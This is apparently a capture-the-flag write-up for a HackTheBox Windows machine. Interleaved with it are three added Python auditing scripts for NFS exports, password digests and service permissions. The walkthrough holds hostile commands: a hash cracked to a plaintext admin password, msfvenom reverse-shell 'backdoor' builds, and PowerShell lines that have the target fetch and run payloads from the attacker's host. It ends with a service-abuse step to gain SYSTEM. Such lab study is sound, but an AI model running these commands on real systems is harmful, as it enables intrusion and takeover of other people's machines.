Nmap Result
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-25 18:02 CEST
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.061s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 5m12s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-25T16:19:27
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 738.36 seconds
Information Gathering
I saw that RPC exposes an NFS service. Let's enumerate that.
showmount --exports 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
Okay, I see that everyone can mount that directory. Let's do that.
sudo mount -t nfs 10.10.10.180:/site_backups /home/jack/htb/remote/site_backups_mount/
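The export list above shows the condition that makes the share mountable without credentials: the client list is "(everyone)". The following Python script is an added example, not part of this write-up; it parses the text that showmount --exports prints and reports exports whose client list allows any host, which is the check a defender would run across NFS servers. The sample output inside it is constructed.

```python
"""Flag NFS exports that any host may mount.

Added example (not from the write-up). Parses `showmount --exports <host>`
output and reports exports whose client list is world-open. The sample
output at the bottom is constructed.
"""

# Client-list entries that mean "any host may mount this export".
WORLD_CLIENTS = {"everyone", "(everyone)", "*"}


def parse_showmount(output: str) -> dict:
    """Map each exported path to its list of allowed clients."""
    exports = {}
    for line in output.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list for"):
            continue
        # Format: "<path> <client>[,<client>...]"; the path has no spaces.
        path, _, clients = line.partition(" ")
        exports[path] = [c.strip() for c in clients.split(",") if c.strip()]
    return exports


def world_mountable(exports: dict) -> list:
    """Return the exported paths that any client may mount."""
    findings = []
    for path, clients in exports.items():
        if any(c.lower() in WORLD_CLIENTS for c in clients):
            findings.append(path)
    return findings


# Constructed sample: one open export, one restricted to a subnet and a host.
SAMPLE_OUTPUT = """Export list for 10.10.10.180:
/site_backups (everyone)
/restricted   10.10.10.0/24,backup.internal
"""

if __name__ == "__main__":
    for path in world_mountable(parse_showmount(SAMPLE_OUTPUT)):
        print(f"[!] {path} is mountable by any host")
```

Run against real output by piping showmount into the script's parser; any path it prints should be restricted to specific client addresses or netgroups in the server's export configuration.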
Inside it there are some configuration files for the web service they are providing. It's called Umbraco. Let's get some hashes.
grep -roE "([\" \'{\[\=]){0,1}(([a-f0-9]){128}|([a-f0-9]){96}|([a-f0-9]){64}|([a-f0-9]){40}|([a-f0-9]){32})([\" \'}\]\,]){0,1}" -a ./*
The only one that I found interesting was /App_Data/Umbraco.sdf, which basically contains a compact relational database saved in the SQL Server Compact (SQL CE) format. I saw that the hash in it is related to Umbraco's admin credentials, admin@local.htb.
The hash was b8be16afba8c314ad33d812f22a04991b90e2aaa
so I used Jack Hash Finder to find the original password.
./jhf b8be16afba8c314ad33d812f22a04991b90e2aaa
b8be16afba8c314ad33d812f22a04991b90e2aaa: baconandcheese
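The grep above pulls out hex runs of 32, 40, 64, 96 or 128 characters, i.e. the digest lengths of MD5, SHA-1, SHA-256, SHA-384 and SHA-512, and the 40-character value recovered in one step because it is an unsalted fast hash. The following Python script is an added example, not code from the write-up; it does the same scan over a backup dump, labels each token by length, and shows that checking a single guess against such a value costs one hashlib call. The sample record is constructed and its digest is computed at run time, not copied from the box.

```python
"""Find bare hex digests in a backup dump and check them against a candidate.

Added example, not from the write-up. Mirrors the grep above: extract hex
runs of a common digest length, label them by length, and test one candidate
string with hashlib. The sample record below is constructed.
"""
import hashlib
import re

# Hex length -> algorithm with that digest size (the lengths the grep matches).
DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256", 96: "sha384", 128: "sha512"}

# Maximal hex runs; the lookarounds stop a longer run being split into a shorter digest.
_HEX_TOKEN = re.compile(r"(?<![0-9a-fA-F])([0-9a-fA-F]{32,128})(?![0-9a-fA-F])")


def digest_of(text: str, algo: str) -> str:
    """Hex digest of `text` under `algo` (e.g. 'sha1')."""
    return hashlib.new(algo, text.encode()).hexdigest()


def find_digests(text: str) -> list:
    """Return (token, algorithm) pairs for hex runs of a known digest length."""
    found = []
    for match in _HEX_TOKEN.finditer(text):
        token = match.group(1)
        algo = DIGEST_LENGTHS.get(len(token))
        if algo:
            found.append((token.lower(), algo))
    return found


def matches_candidate(token: str, candidate: str) -> bool:
    """True if hashing `candidate` with the length-implied algorithm yields `token`."""
    algo = DIGEST_LENGTHS.get(len(token))
    if algo is None:
        return False
    return digest_of(candidate, algo) == token.lower()


# Constructed sample record: the stored value is an unsalted SHA-1 of a known string.
SAMPLE_RECORD = (
    '{"loginName":"admin@example.invalid","password":"'
    + digest_of("constructed-weak-password", "sha1")
    + '","salt":null}'
)

if __name__ == "__main__":
    for token, algo in find_digests(SAMPLE_RECORD):
        hit = matches_candidate(token, "constructed-weak-password")
        print(f"{algo}: {token} matches candidate: {hit}")
```

The defender's takeaway is the condition the scan detects: a password field holding a bare digest of one of these lengths with no salt. A salted, iterated scheme (PBKDF2, bcrypt, Argon2) would not be identifiable by length alone and would not be checkable at one hash call per guess.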
Gaining Access
I saw that the web service is vulnerable, so I used this exploit: Umbraco-RCE.
But first of all, I made two reverse shells with Metasploit, using two different ports. I'll explain why later.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.14.175 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -f exe -o ~/htb/remote/backdoor0.exe
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.14.175 LPORT=8888 -b "\x00" -e x86/shikata_ga_nai -f exe -o ~/htb/remote/backdoor1.exe
Also, we need to get ready for the privilege escalation, so we will download PowerUp.ps1.
We need to fire up a web server so we can download the backdoors to the target machine. We can achieve this by using Python. Get into the folder where the backdoors and the PS1 script are and execute the following command:
python3 -m http.server 8080
Now we're ready to use the exploit.
Open up the reverse shell handler
msfconsole -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LPORT 9999; set LHOST 10.10.14.175; run"
Download the backdoor on the target machine.
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://remote.htb/ -c powershell.exe -a "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/backdoor0.exe', '/Windows/TEMP/backdoor0.exe')"
Execute the backdoor
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://remote.htb/ -c powershell.exe -a "/Windows/TEMP/backdoor0.exe"
Now we have access to the machine!
We can retrieve the flag by entering the following command:
more \Users\Public\user.txt
Privilege Escalation
Now we want to have a PowerShell prompt, since we need to use our PowerUp.ps1 module. After that, we're gonna load the module and execute the function to get all the information we need.
Get the PowerShell prompt:
powershell.exe -nop -exec bypass
Downloading PowerUp.ps1
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/PowerUp.ps1', '/Windows/TEMP/PowerUp.ps1')
Downloading the second backdoor:
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/backdoor1.exe', '/Windows/TEMP/backdoor1.exe')
Now we're ready to try privesc. Execute the following commands to load the PowerUp module and then run Invoke-AllChecks:
Import-Module /Windows/TEMP/PowerUp.ps1
Invoke-AllChecks
The module will start to do some checks and eventually, we find a way:
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -ServiceName 'UsoSvc'
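What PowerUp reports here is a service whose security descriptor grants a non-administrative account a right that lets it change how the service runs (SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or a generic write/all right) while the service itself runs as LocalSystem. The following Python script is an added example, not part of the write-up or of PowerUp; it audits a service DACL given in SDDL form, the string that sc.exe sdshow <service> prints, and reports allow-ACEs that hand such rights to broad groups. The two descriptors inside it are constructed and are not the real UsoSvc descriptor from the box.

```python
"""Audit a Windows service DACL (SDDL form) for rights that let a
low-privilege principal reconfigure the service.

Added example, not from the write-up or PowerUp. On a live host the SDDL
comes from `sc.exe sdshow <service>`; the descriptors below are constructed.
"""
import re

# Service-ACE rights that allow changing how the service runs.
DANGEROUS_RIGHTS = {
    "DC": "SERVICE_CHANGE_CONFIG",
    "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL",
    "GW": "GENERIC_WRITE",
}

# Well-known SID abbreviations for broad, non-administrative groups.
LOW_PRIV_SIDS = {
    "AU": "Authenticated Users",
    "BU": "Users",
    "IU": "Interactive Users",
    "WD": "Everyone",
    "AN": "Anonymous",
}

# ACE layout: (type;flags;rights;object_guid;inherit_object_guid;trustee)
_ACE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")


def parse_dacl(sddl: str) -> list:
    """Return the ACEs of the D: section as (type, rights-string, trustee) tuples."""
    start = sddl.find("D:")
    if start < 0:
        return []
    end = sddl.find("S:", start)          # the SACL, if present, follows the DACL
    dacl = sddl[start:end if end >= 0 else len(sddl)]
    return [(m.group(1), m.group(3), m.group(6)) for m in _ACE.finditer(dacl)]


def split_rights(rights: str) -> list:
    """Split the two-letter rights string (e.g. 'CCDCLCSW') into tokens."""
    if rights.startswith("0x"):           # numeric access-mask form; not decoded here
        return [rights]
    return [rights[i:i + 2] for i in range(0, len(rights), 2)]


def weak_service_aces(sddl: str) -> list:
    """Allow-ACEs that give a low-privilege principal a dangerous right."""
    findings = []
    for ace_type, rights, trustee in parse_dacl(sddl):
        if ace_type != "A":               # only access-allowed entries matter
            continue
        if trustee not in LOW_PRIV_SIDS:
            continue
        bad = sorted(r for r in split_rights(rights) if r in DANGEROUS_RIGHTS)
        if bad:
            findings.append((LOW_PRIV_SIDS[trustee], [DANGEROUS_RIGHTS[r] for r in bad]))
    return findings


# Constructed descriptors: a hardened one, and one that grants Authenticated
# Users SERVICE_CHANGE_CONFIG (the DC right).
SAFE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

if __name__ == "__main__":
    for name, sddl in (("safe", SAFE_SDDL), ("weak", WEAK_SDDL)):
        print(name, weak_service_aces(sddl))
```

Any finding the script prints for a service that starts as LocalSystem is the same class of issue PowerUp flags above; the fix is to remove the offending ACE (or restrict the trustee) so that only administrators and the service control manager can alter the service configuration.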
Do you remember the second backdoor that we generated? It's time to use it.
We're gonna execute the second one with high privileges.
Create a new reverse shell handler:
msfconsole -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LPORT 8888; set LHOST 10.10.14.175; run"
Execute the second backdoor by doing privesc in our current reverse shell:
Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command '/Windows/TEMP/backdoor1.exe'
Done! We got Administrator permissions on our second reverse shell! That's great.
Now we can read the flag:
more \Users\Administrator\Desktop\root.txt